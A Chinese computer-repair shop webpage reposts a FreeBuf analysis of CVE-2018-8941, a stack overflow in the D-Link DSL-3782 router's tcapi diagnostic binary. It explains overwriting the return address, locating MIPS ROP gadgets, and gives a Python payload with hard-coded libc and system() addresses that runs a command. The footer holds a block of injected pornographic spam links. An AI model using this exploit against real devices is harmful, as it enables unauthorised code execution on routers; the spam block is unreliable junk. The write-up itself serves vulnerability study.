錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見(jiàn)故障
錦州市廣廈電腦維修|上門(mén)維修電腦|上門(mén)做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
D-Link DSL-3782 代碼路由器漏洞分析CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

作者: 佚名  日期:2018-05-23 14:25:20   來(lái)源: 本站整理

一. 漏洞概述

CVE-2018-8941 D-Link DSL-3782 代碼執(zhí)行 

友訊科技股份有限公司成立于1986年,專(zhuān)注于電腦網(wǎng)路設(shè)備的設(shè)計(jì)開(kāi)發(fā),并自創(chuàng)「D-Link」品牌,行銷(xiāo)全球。

此漏洞位于 D-Link DSL-3782路由器,授權(quán)用戶(hù)可以遠(yuǎn)程代碼執(zhí)行

參考信息:https://github.com/SECFORCE/CVE-2018-8941#cve-2018-8941-d-link-dsl-3782-code-execution-proof-of-concept

漏洞固件版本:DSL-3782_A1_EU_1.01_07282016.bin

下載鏈接:

https://eu.dlink.com/cz/cs/products/dsl-3782-wireless-ac1200-dual-band-vdsl-adsl-modem-router#Technical-Specifications

漏洞存在于 “/USEFS/BI/TCAPI”二進(jìn)制文件中,它被用作Web GUI中“診斷”功能的實(shí)現(xiàn)代碼,一個(gè)經(jīng)過(guò)身份驗(yàn)證的用戶(hù)可以使用一個(gè)長(zhǎng)緩沖區(qū)作為參數(shù),導(dǎo)致內(nèi)存損壞。此外,可以重定向程序的流程并執(zhí)行任意代碼。

 

 

二. 漏洞分析

 

 

2.1 控制eip

 

 

對(duì)/userfs/bin/tcapi輸入不當(dāng)?shù)膮?shù)會(huì)觸發(fā)漏洞

 

 

MIPS 大端結(jié)構(gòu)

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

Tcapiset 命令用法如下

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

tcapi set會(huì)調(diào)用Libtcapi.so.1中的tcapi_set函數(shù)

 

 

其中第二個(gè)Strcpy拷貝未驗(yàn)證src的長(zhǎng)度,導(dǎo)致棧溢出

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

ra放在-4 ,拷貝的目標(biāo)地址在- 0×258,0×258-0×4=596,

 

 

Payload=”A”*596+”BBBB”測(cè)試一下

 

 

圖片.png

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

Crash的時(shí)候,eip為42424242,位置正確,此時(shí)s1,s0,s2,s3 可以被控制

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

2.2 構(gòu)造rop鏈

 

 

貌似還是很友好

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

由于本身文件很小,可能不太好找到合適的godget,看下內(nèi)存,用了如下的lib文件

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

Libc里面的godget比較多,mips下的rop主要是去找到 move t9,xxx;jalrt9這樣的指令來(lái)達(dá)到控制執(zhí)行流程的目的,其中xxx是我們?cè)谝绯龅臅r(shí)候可以控制的寄存器。此漏洞中我們可以控制s0,s1,s2,s3 寄存器。

 

 

用misprop插件在IDA 搜索godget

 

 

直接搜索從棧中讀取參數(shù)到寄存器的godget

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

找到如下的godget,把棧中的參數(shù)放到s5,再直接放到a0作為下一個(gè)call參數(shù),并把system的地址從s0傳到t9,一個(gè)godget搞定

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

現(xiàn)在只差s5 的值了,可以看到s5=sp+0×10,那么在payload中ra的后面16字節(jié)后再放我們需要system執(zhí)行的參數(shù)

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

 

 

我們的參數(shù)需要放到

 

 

構(gòu)造如下的payload:

#!/usr/bin/envpython  import sys  import struct  libc =0x40868000  s0=struct.pack(">I",0x408C1BB0)#system  s1=struct.pack(">I",0x41414141)#useless  s2=struct.pack(">I",0x43434343)#useless  s3=struct.pack(">I",0x44444444)#useless  ra=struct.pack(">I",0x4087E56C)#godget1  x="A"*580+s0+s1+s2+s3+ra+"x"*16+"ls"

 

 

 

執(zhí)行后,

 

 

可以在截圖中看到,成功執(zhí)行了我們的遠(yuǎn)程命令“ls“”

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠(yuǎn)程代碼執(zhí)行

*本文作者:kczwa1,轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM



熱門(mén)文章
  • 機(jī)械革命S1 PRO-02 開(kāi)機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫(xiě)次數(shù)和判...
  • IIS 8 開(kāi)啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門(mén)禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開(kāi)機(jī)界面...
  • 常見(jiàn)打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門(mén)維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門(mén)服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門(mén)維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤(pán)刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲av无码专区在线电影| 麻豆人妻少妇精品无码专区| gogo少妇无码肉肉视频| 国产色综合久久无码有码| 国产午夜精华无码网站| 无码国产精品一区二区免费式影视| 亚洲另类无码专区丝袜| 国产高清无码毛片| 在人线av无码免费高潮喷水| 亚洲精品无码你懂的网站| 精品少妇无码AV无码专区| 国产av无码专区亚洲av果冻传媒| 亚洲国产成AV人天堂无码| 台湾无码AV一区二区三区| 亚洲av永久无码一区二区三区| 青春草无码精品视频在线观| 亚洲av无码专区在线| 久久精品亚洲中文字幕无码网站| 狠狠噜天天噜日日噜无码| 无码成A毛片免费| 中文成人无码精品久久久不卡| 久久久亚洲精品无码| 久久久久无码专区亚洲av| 亚洲AV无码国产一区二区三区 | 狠狠躁狠狠爱免费视频无码| 91精品无码久久久久久五月天| 免费一区二区无码东京热| 国产精品第一区揄拍无码 | 熟妇人妻AV无码一区二区三区| 免费无码又爽又刺激毛片| 亚洲AV成人无码久久WWW| 亚洲AV无码专区在线亚| 免费无码中文字幕A级毛片| 亚洲av无码专区在线播放| 成在人线av无码免费高潮喷水| 亚洲区日韩区无码区| 亚洲AV无码一区二区三区国产| 午夜寂寞视频无码专区| 亚洲?V无码乱码国产精品| 国产精品成人无码久久久久久 | 综合无码一区二区三区|